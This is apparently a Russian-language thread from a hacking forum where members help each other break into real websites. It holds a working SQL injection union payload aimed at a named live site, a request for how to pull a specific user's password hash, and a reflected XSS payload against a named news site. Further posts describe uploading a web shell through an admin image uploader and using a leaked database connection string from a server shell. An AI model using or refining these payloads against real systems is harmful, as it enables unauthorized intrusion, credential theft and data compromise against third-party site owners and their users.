Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. kostea

    kostea New Member

    Joined:
    23 Dec 2015
    Messages:
    29
    Likes Received:
    0
    Reputations:
    0
  2. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    _________________________
  3. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Бинарарные операции практически эквивалентны в языках XPath и SQL.

    kostea
    , Почитайте про XPath: http://www.w3.org/TR/xpath/

    Пользуясь некоторыми функциями вы сможете доказать или опровергнуть наличие XPath-инъекции, однако это автоматом не означает, что там SQL. К примеру:
    Code:
    substring('12345',0,3)='12'
    substring-before('1999/04/01','/')='1999'
    если что-то не отработает, то значит, что это не XPath.
     
    grimnir likes this.
  4. segodnya

    segodnya New Member

    Joined:
    26 Oct 2015
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
  5. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Используй ExtractValue . Все работает.
     
    _________________________
    Strilo4ka and segodnya like this.
  6. segodnya

    segodnya New Member

    Joined:
    26 Oct 2015
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Пробую, не получается ничего вывести :(
    если можно в ЛС пожалуйста
     
  7. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    там скуля в insert и усе легко крутится, ответили же
    Code:
    https://lk.ourmission.space/?ref=-393' and 0 /*!union*/ select 0x27262873656C656374202A2066726F6D2873656C656374206E616D655F636F6E73742876657273696F6E28292C31292C6E616D655F636F6E73742876657273696F6E28292C31292961292627-- -
     
    segodnya likes this.
  8. segodnya

    segodnya New Member

    Joined:
    26 Oct 2015
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    спасибо, но не могу получить md5 пароль, определенного пользователя :( каким запросом это осуществить!
     
  9. Legionanonymous

    Legionanonymous New Member

    Joined:
    30 Dec 2015
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
  10. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Парни, подскажите как в бурп сюте сохранить карту сайта для передаче sqlmapу. Может не карта сайта называется... что бы не краулить сайт по новой. Спасибо
     
  11. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    С помощью where
     
    _________________________
  12. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    _________________________
  14. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    не получается заюзать.
     
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    что именно заюзать? вы видите там уязвимость?

    по соседству есть Reflected XSS

    Code:
    http://www.maltatoday.com.mt/ui_frontend/<svg onload=prompt(1)>
     
    _________________________
  16. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    xss видел , нельзя выполнить код на стороне сайта, Насколько я понял он должен открывать картинку , если там правильно подсунуть то там возможен rfi наверное... Я ошибаюсь?
     
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    ошибаешься
     
    _________________________
  18. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Окей. Спасибо.
     
  19. y6vmeq

    y6vmeq New Member

    Joined:
    24 Nov 2015
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Люди нужен хелп. Есть доступ к админке, нужен доступ к БД. Думаю найти файлы конфигов через шелл. Залить шелл никак не получается.
    В админке есть редактор CKEditor 3.2 (revision 5191) и есть самописный загрузчик картинок (по содержимому не проверяется, проверяет только расширение и размер, после залития сразу файл переименовывает). Через загрузчик картинок шелл с расширениями картинок заливается на ура. Но вот как заствить его выполниться я не знаю. Опыта очень мало в таких делах.
    Так же в строке поиска (тоже в админке) можно сделать такую ошибку, но я не знаю возможно здесь сделать чтонибудь.
    http://hkar.ru/FTyL
     
  20. kostea

    kostea New Member

    Joined:
    23 Dec 2015
    Messages:
    29
    Likes Received:
    0
    Reputations:
    0
    Такая строка конфига как подключится
    value="server=.\sqlexpress;database=ec*;user id=e**cms;password=**secb***
    хост неуказан подключяюсь с шела,шелл на сервере